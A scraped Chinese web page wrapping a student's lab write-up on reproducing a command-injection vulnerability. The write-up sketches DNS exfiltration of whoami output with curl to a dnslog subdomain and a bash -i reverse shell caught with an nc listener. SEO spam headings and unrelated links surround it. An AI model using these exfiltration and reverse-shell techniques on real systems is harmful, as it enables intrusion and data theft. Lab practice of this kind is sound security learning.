当前位置: 首页 > news >正文

受欢迎的锦州网站建设开发一套软件app

受欢迎的锦州网站建设,开发一套软件app,wordpress主题残留,提升学历报考什么专业比较好任务一#xff1a; 复现环境中的命令注入漏洞。 任务二#xff1a; 利用命令注入执行whoami#xff0c;使用DNS外带技术获取结果 任务三#xff1a;使用反弹shell#xff0c;将漏洞环境中的shell反弹到宿主机或者vps服务器。 任务一#xff1a; 1.搭建好环境 2.先去了…任务一 复现环境中的命令注入漏洞。 任务二 利用命令注入执行whoami使用DNS外带技术获取结果 任务三使用反弹shell将漏洞环境中的shell反弹到宿主机或者vps服务器。 任务一 1.搭建好环境 2.先去了解一下这个网站的功能 3.首先查看存在的metric发现在这里是0 4.我们写入一个metric首先利用burpsuite进行抓包然后用post请求添加请求体加入metric然后我们再次查看metrics发现我们已经成功写入一个metric。 5.然后进行代码执行漏洞在tmp下创建一个success文件得到回显 6.然后进入容器中查看一定要查看创建的文件路径其他的包含任何的都不是因为这个找了好久好久其实很早就做出来了还以为做错了无语死了。 任务二 1.直接把输出的whoami重定向到1.txt文件里面中间要用%20作为空格不然会失败因为这个卡了好久看到burpsuite的颜色那里不对了 2.查看1.txt文件发现我是root。 3.如果是利用DNS外带技术获得结果的话 首先登入dnslog.cn然后点击get subdomain获得专属的子域名。 4.然后使用curl $(whoami).子域名然后上面回显的时候出现了root.子域名得到这里有一个问题最开始用的ping一直没ping通不知道为啥 任务三 1.用bash -c “bash -i ·········“ 2.这里试了很久自己的反弹shell都不成功然后试了很多次先是把端口打开了用ufw添加端口 ufw allow 端口然后把自己的nc变成了 nc -lvp 端口然后再sec一次反弹成功了。
http://www.dnsts.com.cn/news/208771.html

相关文章:

  • 做网站手机适配需要加价吗成都哪里好玩好吃
  • 有域名就可以做网站么包头公司注册
  • php网站开发 薪资 东莞wordpress 中文摘要
  • 苏州seo网站公司河北省城乡和建设厅网站首页
  • 成品网站管理系统 源码wordpress上传主题失败
  • 做网站的软件公司深圳网站建设索q.479185700
  • 自动化产品的网站建设建设互联网地方垂直网站
  • dw软件下载官方网站scda设计公司官网
  • 网站建设客户分析网站建设费科目属于无形资产么
  • 西安高端网站建设哪家好长沙高端网站制作公司
  • 提交网站收录入口网站建设合伙人
  • 做网站电销话术项目设计课题研究高中综合评价
  • 吴中区网站设计公司刀客源码网
  • 石家庄自己的网站做美食介绍的网站
  • 网站从哪几个方面维护网站模板制作教程视频教程
  • 湖南网站设计公司seo网络营销课程
  • 网站编程设计心得体会文件管理系统
  • 学做川菜网站建设部网站四库一平台
  • 镇江网站建设个天元建设集团有限公司七公司
  • 记事本做的网站链接怎么装饰关于网站建设的通知
  • 长春网站建设专业公司广州发布最新通知
  • 网站注册页面跳出怎么做宁波网页设计机构
  • 哪里可以做网站wordpress去除谷歌字体
  • 益阳市建设网站好用的网站开发框架
  • python 做网站 用哪个框架好公司名字变了网站备案
  • 专做it招聘的网站怎么才能搜索到自己做的网站
  • 做网站代理商北京网络营销推广外包
  • 网站建设html5模板北京市违法建设投诉网站
  • 怎么开发网站农产品电商网站的建设需求
  • 连云港新站优化网站建设公司薪资